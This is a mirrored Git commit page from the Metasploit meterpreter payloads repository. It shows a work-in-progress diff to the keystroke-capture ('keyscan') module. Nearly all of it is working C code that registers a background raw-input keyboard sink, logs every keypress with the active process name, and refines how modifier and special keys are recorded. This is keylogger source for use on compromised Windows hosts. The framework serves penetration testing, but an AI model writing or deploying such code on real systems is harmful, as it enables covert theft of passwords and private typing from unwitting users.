mirror of
https://github.com/rapid7/metasploit-payloads
synced 2025-03-30 22:19:17 +02:00
save wip
This commit is contained in:
William Webb
parent
145285c549
commit
3653169513
c/meterpreter/source/extensions/stdapi/server/ui
@ -7,14 +7,14 @@ extern HMODULE hookLibrary;
|
|||||||
extern HINSTANCE hAppInstance;
|
extern HINSTANCE hAppInstance;
|
||||||
|
|
||||||
LRESULT CALLBACK ui_keyscan_wndproc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam);
|
LRESULT CALLBACK ui_keyscan_wndproc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam);
|
||||||
int ui_log_key(UINT vKey);
|
INT ui_log_key(UINT vKey, USHORT mCode, USHORT Flags);
|
||||||
int ui_resolve_raw_api();
|
INT ui_resolve_raw_api();
|
||||||
|
|
||||||
const char *c0_ascii[] = {
|
const WCHAR *c0[] = {
|
||||||
"^@", "^A", "^B", "^C", "^D", "^E", "^F", "^G", "^H", "^I",
|
L"^@", L"^A", L"^B", L"^C", L"^D", L"^E", L"^F", L"^G", L"^H", L"^I",
|
||||||
"^J", "^K", "^L", "^M", "^N", "^O", "^P", "^Q", "^R", "^S",
|
L"^J", L"^K", L"^L", L"^M", L"^N", L"^O", L"^P", L"^Q", L"^R", L"^S",
|
||||||
"^T", "^U", "^V", "^W", "^X", "^Y", "^Z", "^[", "^\\", "^]",
|
L"^T", L"^U", L"^V", L"^W", L"^X", L"^Y", L"^Z", L"^[", L"^\\", L"^]",
|
||||||
"^^", "^-"
|
L"^^", L"^-"
|
||||||
};
|
};
|
||||||
|
|
||||||
/*
|
/*
|
||||||
@ -70,7 +70,7 @@ WCHAR *keyscan_buf = NULL;
|
|||||||
size_t idx = 0;
|
size_t idx = 0;
|
||||||
WCHAR active_image[MAX_PATH] = L"Logging started";
|
WCHAR active_image[MAX_PATH] = L"Logging started";
|
||||||
WCHAR prev_active_image[MAX_PATH] = { 0 };
|
WCHAR prev_active_image[MAX_PATH] = { 0 };
|
||||||
|
DWORD dwThreadId;
|
||||||
/*
|
/*
|
||||||
* needed for process enumeration
|
* needed for process enumeration
|
||||||
*/
|
*/
|
||||||
@ -78,11 +78,11 @@ WCHAR prev_active_image[MAX_PATH] = { 0 };
|
|||||||
typedef struct {
|
typedef struct {
|
||||||
DWORD ppid;
|
DWORD ppid;
|
||||||
DWORD cpid;
|
DWORD cpid;
|
||||||
} wndinfo;
|
} WNDINFO;
|
||||||
|
|
||||||
|
|
||||||
BOOL CALLBACK ecw_callback(HWND hWnd, LPARAM lp) {
|
BOOL CALLBACK ecw_callback(HWND hWnd, LPARAM lp) {
|
||||||
wndinfo* info = (wndinfo*)lp;
|
WNDINFO* info = (WNDINFO*)lp;
|
||||||
DWORD pid = 0;
|
DWORD pid = 0;
|
||||||
GetWindowThreadProcessId(hWnd, &pid);
|
GetWindowThreadProcessId(hWnd, &pid);
|
||||||
if (pid != info->ppid) info->cpid = pid;
|
if (pid != info->ppid) info->cpid = pid;
|
||||||
@ -164,8 +164,8 @@ LRESULT CALLBACK ui_keyscan_wndproc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM l
|
|||||||
{
|
{
|
||||||
// register raw input device
|
// register raw input device
|
||||||
case WM_CREATE:
|
case WM_CREATE:
|
||||||
rid.usUsagePage = 0x01;
|
rid.usUsagePage = 0x01; // Generic Desktop Controls
|
||||||
rid.usUsage = 0x06;
|
rid.usUsage = 0x06; // Keyboard
|
||||||
rid.dwFlags = RIDEV_INPUTSINK;
|
rid.dwFlags = RIDEV_INPUTSINK;
|
||||||
rid.hwndTarget = hwnd;
|
rid.hwndTarget = hwnd;
|
||||||
|
|
||||||
@ -189,7 +189,7 @@ LRESULT CALLBACK ui_keyscan_wndproc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM l
|
|||||||
if(buffer->header.dwType == RIM_TYPEKEYBOARD
|
if(buffer->header.dwType == RIM_TYPEKEYBOARD
|
||||||
&& buffer->data.keyboard.Message == WM_KEYDOWN)
|
&& buffer->data.keyboard.Message == WM_KEYDOWN)
|
||||||
{
|
{
|
||||||
if(ui_log_key(buffer->data.keyboard.VKey) == -1)
|
if(ui_log_key(buffer->data.keyboard.VKey, buffer->data.keyboard.MakeCode, buffer->data.keyboard.Flags) == -1)
|
||||||
DestroyWindow(hwnd);
|
DestroyWindow(hwnd);
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
@ -309,17 +309,20 @@ DWORD request_ui_get_keys_utf8(Remote *remote, Packet *request)
|
|||||||
* log keystrokes
|
* log keystrokes
|
||||||
*/
|
*/
|
||||||
|
|
||||||
int ui_log_key(UINT vKey)
|
int ui_log_key(UINT vKey, USHORT mCode, USHORT Flags)
|
||||||
{
|
{
|
||||||
BYTE lpKeyboard[256];
|
BYTE lpKeyboard[256];
|
||||||
WCHAR kb[16] = { 0 };
|
WCHAR kb[16] = { 0 };
|
||||||
HWND foreground_wnd;
|
HWND foreground_wnd;
|
||||||
HANDLE active_proc;
|
HANDLE active_proc;
|
||||||
SYSTEMTIME st;
|
SYSTEMTIME st;
|
||||||
wndinfo info = { 0 };
|
WNDINFO info = { 0 };
|
||||||
DWORD mpsz = MAX_PATH;
|
DWORD mpsz = MAX_PATH;
|
||||||
WCHAR date_s[256] = { 0 };
|
WCHAR date_s[256] = { 0 };
|
||||||
WCHAR time_s[256] = { 0 };
|
WCHAR time_s[256] = { 0 };
|
||||||
|
WCHAR gknt_buf[256] = { 0 };
|
||||||
|
const bool isE0 = ((Flags & RI_KEY_E0) != 0);
|
||||||
|
const bool isE1 = ((Flags & RI_KEY_E1) != 0);
|
||||||
|
|
||||||
GetKeyState(VK_CAPITAL); GetKeyState(VK_SCROLL); GetKeyState(VK_NUMLOCK);
|
GetKeyState(VK_CAPITAL); GetKeyState(VK_SCROLL); GetKeyState(VK_NUMLOCK);
|
||||||
GetKeyboardState(lpKeyboard);
|
GetKeyboardState(lpKeyboard);
|
||||||
@ -357,6 +360,10 @@ int ui_log_key(UINT vKey)
|
|||||||
CloseHandle(active_proc);
|
CloseHandle(active_proc);
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// needed for some wonky cases
|
||||||
|
UINT key = (mCode << 16) | (isE0 << 24);
|
||||||
|
BOOL ctrl_is_down = (1 << 15) & (GetAsyncKeyState(VK_CONTROL));
|
||||||
|
|
||||||
switch (vKey)
|
switch (vKey)
|
||||||
{
|
{
|
||||||
case VK_BACK:
|
case VK_BACK:
|
||||||
@ -365,29 +372,33 @@ int ui_log_key(UINT vKey)
|
|||||||
case VK_RETURN:
|
case VK_RETURN:
|
||||||
idx += _snwprintf(keyscan_buf + idx, KEYBUFSIZE, L"<CR>\r\n");
|
idx += _snwprintf(keyscan_buf + idx, KEYBUFSIZE, L"<CR>\r\n");
|
||||||
break;
|
break;
|
||||||
case VK_SHIFT:
|
|
||||||
break;
|
|
||||||
case VK_LCONTROL:
|
|
||||||
idx += _snwprintf(keyscan_buf + idx, KEYBUFSIZE, L"<Ctrl>");
|
|
||||||
break;
|
|
||||||
case VK_MENU:
|
case VK_MENU:
|
||||||
idx += _snwprintf(keyscan_buf + idx, KEYBUFSIZE, L"<Alt>");
|
if (isE0)
|
||||||
|
idx += _snwprintf(keyscan_buf + idx, KEYBUFSIZE, L"<RAlt>");
|
||||||
|
else
|
||||||
|
idx += _snwprintf(keyscan_buf + idx, KEYBUFSIZE, L"<LAlt>");
|
||||||
break;
|
break;
|
||||||
case VK_TAB:
|
case VK_TAB:
|
||||||
idx += _snwprintf(keyscan_buf + idx, KEYBUFSIZE, L"<Tab>");
|
idx += _snwprintf(keyscan_buf + idx, KEYBUFSIZE, L"<Tab>");
|
||||||
break;
|
break;
|
||||||
|
case VK_NUMLOCK: // pause/break and numlock both send the same message
|
||||||
|
key = (MapVirtualKey(vKey, MAPVK_VK_TO_VSC) | 0x100);
|
||||||
|
if (GetKeyNameTextW((LONG)key, (LPWSTR)gknt_buf, mpsz))
|
||||||
|
idx += _snwprintf(keyscan_buf + idx, KEYBUFSIZE, L"<%ls>", gknt_buf);
|
||||||
|
break;
|
||||||
default:
|
default:
|
||||||
if (ToUnicodeEx(vKey, MapVirtualKey(vKey, 0), lpKeyboard, kb, 16, 0, NULL) == 1)
|
if (ctrl_is_down && (vKey != VK_CONTROL))
|
||||||
{
|
{
|
||||||
if ((UINT)vKey <= 0x1f)
|
if (GetKeyNameTextW((LONG)key, (LPWSTR)gknt_buf, mpsz))
|
||||||
{
|
idx += _snwprintf(keyscan_buf + idx, KEYBUFSIZE, L"<^%ls>", gknt_buf);
|
||||||
idx += _snwprintf(keyscan_buf + idx, KEYBUFSIZE, L"%ls", c0_ascii[vKey]);
|
}
|
||||||
return 0;
|
else if (ToUnicodeEx(vKey, mCode, lpKeyboard, kb, 16, 0, NULL) == 1)
|
||||||
}
|
{
|
||||||
else
|
idx += _snwprintf(keyscan_buf + idx, KEYBUFSIZE, L"%ls", kb);
|
||||||
{
|
}
|
||||||
idx += _snwprintf(keyscan_buf + idx, KEYBUFSIZE, L"%ls", kb);
|
else if (GetKeyNameTextW((LONG)key, (LPWSTR)gknt_buf, mpsz))
|
||||||
}
|
{
|
||||||
|
idx += _snwprintf(keyscan_buf + idx, KEYBUFSIZE, L"<%ls>", gknt_buf);
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
return 0;
|
return 0;
|
||||||
|
|||||||
@ -10,6 +10,8 @@
|
|||||||
#define RIM_TYPEHID 2
|
#define RIM_TYPEHID 2
|
||||||
|
|
||||||
#define RIDEV_INPUTSINK 0x00000100
|
#define RIDEV_INPUTSINK 0x00000100
|
||||||
|
#define RI_KEY_E0 2
|
||||||
|
#define RI_KEY_E1 4
|
||||||
|
|
||||||
/*
|
/*
|
||||||
* Raw Input Messages.
|
* Raw Input Messages.
|
||||||
@ -150,4 +152,4 @@ typedef BOOL (WINAPI *f_RegisterRawInputDevices)(
|
|||||||
__in UINT cbSize);
|
__in UINT cbSize);
|
||||||
|
|
||||||
typedef DWORD (WINAPI *f_QueryFullProcessImageNameW) (HANDLE, DWORD, LPTSTR, PDWORD);
|
typedef DWORD (WINAPI *f_QueryFullProcessImageNameW) (HANDLE, DWORD, LPTSTR, PDWORD);
|
||||||
typedef DWORD (WINAPI *f_GetProcessImageFileNameW) (HANDLE, LPTSTR, DWORD);
|
typedef DWORD (WINAPI *f_GetProcessImageFileNameW) (HANDLE, LPTSTR, DWORD);
|
||||||
Loading…
x
Reference in New Issue
Block a user